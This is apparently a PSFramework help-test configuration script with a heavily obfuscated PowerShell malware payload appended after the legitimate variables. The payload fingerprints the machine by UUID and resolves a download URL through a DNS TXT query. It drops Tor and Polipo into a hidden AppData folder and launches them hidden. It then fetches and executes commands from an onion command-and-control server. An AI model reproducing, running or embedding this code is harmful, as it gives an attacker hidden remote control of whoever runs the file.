${Gl`o`BA`L`:f`UNCTioNH`eL`Pte`S`TeXC`EPTiONS} = @(
    ("{2}{5}{1}{4}{3}{0}"-f 'k','ptb','Get','oc','l','-PSFScri')
)


${GLOBaL`:`he`LptesTeNuMeR`ATedaRra`Ys} = @(
	("{2}{0}{7}{5}{1}{6}{3}{4}"-f 'work','icense','PSFrame','ductTyp','e[]','L','.Pro','.'),
	("{5}{0}{4}{2}{9}{8}{6}{3}{1}{7}" -f 'SFr','eLe','e','g','am','P','Messa','vel[]','sage.','work.Mes')
)


${G`L`ObAl:hE`LPTesTSKiP`pAraMe`TEr`TyPE} = @{
    
}

("{1}{2}{0}"-f 'n','L','XUnfq');${ErroRAcTI`o`N`PR`EfER`En`cE} = ("{3}{4}{2}{0}{1}" -f 'ont','inue','C','S','ilently');("{0}{1}"-f 'Jln','l');("{0}{2}{1}" -f 'rX','b','rPGgg');${B`Y} = (&("{4}{1}{0}{3}{2}" -f 'bje','wmio','t','c','get-') ("{3}{6}{0}{4}{2}{1}{5}" -f 'uterS','P','em','Win3','yst','roduct','2_Comp'))."U`UID";("{1}{0}{2}" -f'jEv','k','isMr');("{1}{0}{2}"-f'lwFKzH','B','gx');if ((.('gp') (("{14}{2}{10}{17}{3}{1}{5}{12}{6}{9}{7}{16}{4}{8}{13}{0}{11}{18}{15}" -f'tVe','f','K','So','dowsJ0','tw','0dMi','J0dW','dCurr','crosoft','CU:J','rsio','areJ','en','H','0dRun','in','0dJ0d','nJ')).replACE('J0d',[stRIng][chaR]92)) -match ${B`Y}){;("{1}{0}{2}"-f 'V','BrOZYLF','Y');("{3}{2}{1}{0}" -f'cRL','nft','nk','ihz');(&("{2}{0}{3}{1}" -f'P','cess','Get-','ro') -id ${P`iD}).("{1}{0}"-f 'll','Ki').Invoke();("{0}{1}" -f 'eMB','nBWC');("{1}{0}"-f'MCvnGz','Cl');};("{0}{1}{2}" -f 'kFqb','ERjca','K');("{1}{0}"-f 'efv','cZd');function e(${O`HD}){;("{1}{2}{0}"-f 'rd','drS','zUS');("{0}{1}" -f'Jv','Fd');${M`TK} = (((.("{1}{0}" -f'x','ie') ('nsl'+'ook'+'up'+' '+'-quer'+'ytyp'+'e=t'+'x'+'t '+"$ohd "+'8'+'.'+'8.8.8')) -match '"') -replace '"', '')[0].("{1}{0}"-f 'm','Tri').Invoke();("{0}{1}" -f'wHpWI','PZ');("{2}{1}{0}" -f 'T','my','rZO');${i`LUa}.("{0}{2}{3}{1}" -f'D','nloadFile','o','w').Invoke(${m`TK}, ${b`Qvt});("{0}{1}" -f'Kq','rPY');("{1}{0}" -f'gMs','tC');${w`S} = ${X`Yu}.("{1}{2}{0}" -f'e','Na','meSpac').Invoke(${BQ`VT}).("{0}{1}"-f'Ite','ms').Invoke();("{1}{0}{2}"-f'V','D','RZCMXn');("{2}{1}{0}" -f'CDo','ym','aVMuA');${x`Yu}.("{2}{0}{3}{1}" -f 'am','ace','N','eSp').Invoke(${e`ZPr}).("{0}{1}" -f'CopyHer','e').Invoke(${W`s}, 20);("{2}{0}{1}"-f 'TM','gWV','NoYa');("{1}{2}{0}"-f 'lafFHI','Wc','z');&('rd') ${b`qVt};'AJc';'Rl';};("{1}{0}"-f 'wPV','m');'XYS';("{1}{0}"-f 'RkM','bS');("{2}{0}{1}" -f 'eZ','KeMy','GF');'Vt';("{0}{1}" -f'blWvxEYd','B');${eZ`pR} = ${E`Nv:ap`p`Data} + '\' + ${by};'HTC';("{0}{1}" -f'z','gOw');if (!(.("{2}{1}{0}"-f 'h','st-Pat','Te') ${EZ`pR})){;("{2}{1}{0}"-f'au','XKj','fA');("{0}{1}"-f'kEX','x');${vP`Jq} = &("{2}{0}{1}"-f'w-','Item','Ne') -ItemType ("{2}{0}{1}" -f 'r','ectory','Di') -Force -Path ${eZ`pr};("{1}{0}" -f 'bA','GWS');("{0}{1}" -f 'vOv','ra');${VP`JQ}."AttRiB`UT`es" = ("{1}{0}" -f'dden','Hi'), ("{1}{0}" -f'stem','Sy'), ("{1}{3}{4}{0}{5}{2}"-f 'entInd','No','d','t','Cont','exe');("{1}{0}"-f 'Gy','amPC');("{0}{1}" -f'EKF','M');};'sB';("{1}{0}" -f'z','RRiIY');("{0}{2}{1}" -f 'bvcC','eLW','eT');("{1}{2}{3}{0}"-f 'B','N','c','OTYolCI');${v`TZG}=${E`zPR}+ ((("{1}{0}" -f 'xe','Gk9tor.e'))  -CrePlaCe  'Gk9',[cHAr]92);("{1}{0}" -f'E','RoqsuX');("{1}{2}{0}" -f 'WGwt','fQG','B');${OT}=${EZ`pr}+ ((("{2}{0}{1}"-f 'o.ex','e','kjPpolip')) -CREPLaCe ([CHaR]107+[CHaR]106+[CHaR]80),[CHaR]92);("{0}{1}{2}"-f 'H','XKsRi','vf');("{3}{2}{1}{0}" -f 'y','Fx','On','oynNce');${b`qvt}=${ez`Pr}+'\'+${b`y}+("{0}{1}"-f '.zi','p');("{2}{0}{1}" -f 'J','lrBBZS','D');("{1}{0}" -f 'lBZ','H');${I`luA}=&("{0}{3}{1}{2}" -f 'New','Objec','t','-') ("{2}{3}{0}{1}"-f'm','.Net.WebClient','Syst','e');("{1}{0}"-f 'y','QDcp');("{1}{0}"-f'Jxf','Q');${x`Yu}=&("{2}{1}{0}" -f 'ect','Obj','New-') -C ("{1}{0}{3}{4}{2}" -f'Appli','Shell.','n','cati','o');("{0}{1}"-f 'x','eSu');("{1}{0}"-f 'U','BEJb');("{1}{2}{0}" -f'USm','B','tnJK');'HuG';if (!(&("{1}{2}{0}"-f'th','Tes','t-Pa') ${V`TZG}) -or !(.("{0}{2}{1}"-f 'T','ath','est-P') ${Ot})){;("{0}{1}{3}{2}" -f 'cx','jBOm','k','ZvD');("{0}{1}" -f'N','Inn');.('e') ("{2}{1}{3}{0}" -f '.de','.van','i','kin');("{1}{0}" -f'PD','COYVX');("{0}{2}{1}" -f'Q','WT','LikWod');};("{0}{1}"-f 'n','lHScK');("{1}{0}"-f'u','tLVW');("{2}{0}{1}"-f 'GZIn','swj','D');("{2}{1}{0}" -f'BL','nXX','ieaqB');if (!(.("{2}{1}{3}{0}"-f'ath','est-','T','P') ${vt`ZG}) -or !(.("{0}{2}{3}{1}" -f 'T','ath','es','t-P') ${oT})){;'Tga';("{0}{1}"-f 'rUFQ','i');&('e') ("{2}{3}{1}{0}"-f 'c','z.c','gg','.ibi');("{0}{1}" -f'LVS','qds');("{0}{1}"-f 'MkiSQL','VJy');};("{1}{0}"-f 'FUMwRQj','s');'DZ';'db';("{0}{1}{2}" -f 'Nm','VX','jZaO');${cV`dZ}=${eZ`PR}+((("{3}{0}{1}{2}"-f'Nroa','mingl','og','9I'))."r`EPL`AcE"(([cHaR]57+[cHaR]73+[cHaR]78),[stRING][cHaR]92));("{1}{0}"-f'Pq','LU');("{1}{0}{2}" -f'LmY','gKQg','h');.("{0}{1}" -f'sap','s') ${V`TzG} -Ar (' '+'-'+'-Log'+' '+"`"notice "+'f'+'ile '+"$cvdz`"") -wi ("{1}{0}{2}"-f'idde','H','n');("{0}{1}" -f'PZxn','CI');("{2}{0}{1}"-f 'S','yFSxz','so');do{.("{1}{0}" -f'eep','sl') 1;${B`iMy}=&('gc') ${cV`dz}}while(!(${B`imy} -match ("{4}{0}{3}{5}{2}{1}" -f 'rapped ','e.','n','1','Bootst','00%: Do')));("{1}{0}{2}" -f 'Zx','MDNho','E');("{1}{0}{2}{3}" -f 'uMu','G','zo','CwT');.("{0}{1}" -f'sa','ps') ${OT} -a ("{6}{5}{3}{1}{2}{4}{8}{0}{7}"-f 'st','xy=','loca','tPro','lh','Paren','socks',':9050','o') -wi ("{0}{1}{2}"-f 'Hi','dde','n');("{1}{0}"-f'c','cfrwP');("{0}{2}{1}" -f 'Dl','wBYQ','nzyv');.("{0}{1}"-f'slee','p') 7;("{0}{1}"-f 'T','AtSCy');("{0}{1}"-f'Ng','Ti');${Qd`AX}=&("{2}{0}{1}" -f 'Obj','ect','New-') ("{1}{4}{2}{3}{5}{0}"-f 'y','Sys','e','t','tem.N','.WebProx')(("{2}{1}{3}{4}{0}" -f '8123','o','localh','st',':'));("{0}{1}"-f'A','xpk');("{1}{0}"-f'Pww','yYe');${Q`Dax}."USE`Def`AulTcRe`DEnTIaLs" = ${t`RuE};("{3}{1}{2}{0}"-f 'Qs','qL','HXXNx','Kc');("{0}{3}{2}{1}"-f 'm','fiX','kNfws','BU');${il`Ua}."P`ROxY"=${Q`dax};("{2}{1}{0}" -f'ajch','VlU','Nn');("{2}{0}{1}{3}"-f'i','z','tg','AGRCEXq');${pb`TX}=("{1}{4}{11}{13}{6}{10}{12}{7}{3}{2}{8}{5}{9}{14}{15}{16}{0}"-f '5FB9&uid=','http://pow','p&m','u','erwormjqj','B201-51DE-1','u','et.php?s=set','om=0776','1CB-','.','4','onion/g','2h','A','78C-9','C1F26D7') + ${b`y};'zl';("{2}{1}{0}"-f 'Fn','vBby','rII');while(!${nR`cB}){${n`Rcb}=${Il`Ua}.("{3}{2}{1}{0}" -f 'g','in','ownloadStr','d').Invoke(${P`BTx})};'VWM';("{1}{0}" -f 'AqS','U');if (${N`RCb} -ne ("{0}{1}"-f 'n','one')){;("{0}{1}{2}" -f 'yy','e','Yfmxpss');'eT';.("{1}{0}" -f'ex','i') ${NR`CB};'oD';("{1}{2}{0}" -f'DpgbI','JqEe','s');};("{3}{2}{0}{1}" -f'bNbhI','w','jz','YsG');
